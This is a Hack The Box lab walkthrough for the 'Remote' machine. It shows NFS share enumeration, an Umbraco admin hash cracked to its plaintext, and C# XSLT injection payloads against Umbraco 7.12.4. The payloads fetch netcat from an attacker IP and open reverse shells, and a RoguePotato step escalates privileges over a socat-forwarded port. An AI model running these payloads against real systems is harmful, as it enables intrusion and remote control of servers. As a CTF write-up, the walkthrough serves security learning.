HTB [Remote]


#windows#nfs#xslt-injection#RoguePotato

Recon

portscan

PORT      STATE SERVICE       REASON  VERSION
21/tcp    open  ftp           syn-ack Microsoft ftpd
| ftp-syst:
|_  SYST: Windows_NT
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
80/tcp    open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Home - Acme Widgets
111/tcp   open  rpcbind       syn-ack 2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds? syn-ack
2049/tcp  open  mountd        syn-ack 1-3 (RPC #100005)
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         syn-ack Microsoft Windows RPC
49665/tcp open  msrpc         syn-ack Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack Microsoft Windows RPC
49678/tcp open  msrpc         syn-ack Microsoft Windows RPC
49679/tcp open  msrpc         syn-ack Microsoft Windows RPC
49680/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -5h29m58s
| smb2-time:
|   date: 2023-01-24T11:01:52
|_  start_date: N/A
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 45222/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 52310/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 51032/udp): CLEAN (Failed to receive data)
|   Check 4 (port 15893/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required

Initial foothold

  • Anonymous login enabled, but no files in FTP
  • Let’s check NFS
 showmount -e 10.10.10.180
Export list for 10.10.10.180:
/site_backups (everyone)
  • I’m gonna mount this to my local
mkdir remote_mount
➜ mount -t nfs 10.10.10.180:/ remote_mount
➜ tree -a remote_mount 
<SNIP>
486 directories, 1887 files
  • The output is huge, so let me snip the output
  • They’re using Umbraco as the Content management system in their website

  • I’ve got this hash b8be16afba8c314ad33d812f22a04991b90e2aaa in App_Data/Umbraco.sdf file
  • Cracking the hash gives the password baconandcheese
  • Let’s login with these creds admin@htb.local:baconandcheese at Umbraco login page

Initial shell

  • They’re using Umbraco version 7.12.4 , you can see this in the about page after logging in
  • There’s an Remote Code Execution vulnerability in this version
  • For some reasons I’m gonna do this exploit part manually, coz the exploits available in internet are not working properly
  • Let’s create a .xslt file in http://10.10.10.180/umbraco/#/developer tab

Note: Go through this exploit db page to get some basic understanding about this exploit Coz you need to know how it works

  • Let’s create a new file
  • Now let’s try to do XSLT injection
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE dtd_sample[<!ENTITY ext_file SYSTEM "C:\Windows\System32\drivers\etc\hosts">]>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
&ext_file;
</xsl:template>
</xsl:stylesheet>
  • Using this we can do XXE attack to read local files

  • Click this button to visualize XSLT

  • Now click this button

  • Cool we can read C:\Windows\System32\drivers\etc\hosts

XSLT to RCE

<?xml version="1.0"?>
<xsl:stylesheet version="1.0"
	xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
	xmlns:msxsl="urn:schemas-microsoft-com:xslt"
	xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">
	<msxsl:script language="C#" implements-prefix="csharp_user">
		public string xml() { 
		string cmd = "/c curl 10.10.16.3"; 
		System.Diagnostics.Process proc = new System.Diagnostics.Process(); 
		proc.StartInfo.FileName = "cmd.exe"; 
		proc.StartInfo.Arguments = cmd; 
		proc.StartInfo.UseShellExecute = false; 
		proc.StartInfo.RedirectStandardOutput = true; 
		proc.Start(); 
		string output = proc.StandardOutput.ReadToEnd(); 
		return output; 
		}  
	</msxsl:script>
	<xsl:template match="/">
		<xsl:value-of select="csharp_user:xml()"/>
	</xsl:template>
</xsl:stylesheet>
  • I’ve got this payload from exploit db
  • This payload uses c sharp script to execute commands
  • I’ve changed few parts like string cmd = "/c curl 10.10.16.3" and proc.StartInfo.FileName = "cmd.exe";
  • After pasting this click view xslt button again

  • Here we got a hit in our server
  • And you can see the output in the window behind that terminal, .bash_history and .bashrc_orginal are my local files
  • Now let’s try to get a reverse shell
<?xml version="1.0"?>
<xsl:stylesheet version="1.0"
	xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
	xmlns:msxsl="urn:schemas-microsoft-com:xslt"
	xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">
	<msxsl:script language="C#" implements-prefix="csharp_user">
		public string xml() {
		string cmd = @"/c dir http://10.10.16.3/nc64.exe -o C:\Users\Public\nc.exe"; 
		System.Diagnostics.Process proc = new System.Diagnostics.Process(); 
		proc.StartInfo.FileName = "cmd.exe"; 
		proc.StartInfo.Arguments = cmd; 
		proc.StartInfo.UseShellExecute = false; 
		proc.StartInfo.RedirectStandardOutput = true; 
		proc.Start(); 
		string output = proc.StandardOutput.ReadToEnd(); 
		return output; 
		}  
	</msxsl:script>
	<xsl:template match="/">
		<xsl:value-of select="csharp_user:xml()"/>
	</xsl:template>
</xsl:stylesheet>
  • Start a webserver and use this payload to download the nc64.exe file in C:\Users\Public\ directory
<?xml version="1.0"?>
<xsl:stylesheet version="1.0"
	xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
	xmlns:msxsl="urn:schemas-microsoft-com:xslt"
	xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">
	<msxsl:script language="C#" implements-prefix="csharp_user">
		public string xml() {
		string cmd = @"/c C:\Users\Public\nc.exe 10.10.16.3 1337 -e cmd.exe"; 
		System.Diagnostics.Process proc = new System.Diagnostics.Process(); 
		proc.StartInfo.FileName = "cmd.exe"; 
		proc.StartInfo.Arguments = cmd; 
		proc.StartInfo.UseShellExecute = false; 
		proc.StartInfo.RedirectStandardOutput = true; 
		proc.Start(); 
		string output = proc.StandardOutput.ReadToEnd(); 
		return output; 
		}  
	</msxsl:script>
	<xsl:template match="/">
		<xsl:value-of select="csharp_user:xml()"/>
	</xsl:template>
</xsl:stylesheet>
  • Then use this payload to get a rev shell

  • Time to escalate privillege

Privesc

  • We have SeImpersonatePrivilege, so we can upload RoguePotato to escalate privilleges
  • First we need to use socat to listen on port 135 and portforward it to the machine
socat tcp-listen:135,reuseaddr,fork tcp:10.10.10.180:9999

./RoguePotato.exe -r 10.10.16.3 -e “cmd.exe /c curl 10.10.16.3” -l 9999

  • Cool we have code execution, now time for a rev shell

./RoguePotato.exe -r 10.10.16.3 -e “cmd.exe /c nc.exe 10.10.16.3 1337 -e cmd.exe” -l 9999

  • We got a rev shell :)
  • There’s an another way to privesc using teamviewer
  • If you list the running tasks you can see the machine is running teamviewer 7
  • And it’s a old version
  • You can gather Windows Password using it!
  • Use this post/windows/gather/credentials/teamviewer_passwords msf module to do that

  • After getting the password, you can login using winrm Administrator:!R3m0te!
  • Hope you’ll like this post :) cya soon

Hack The Box

It would be appreciated if you give me a respect+ on HTB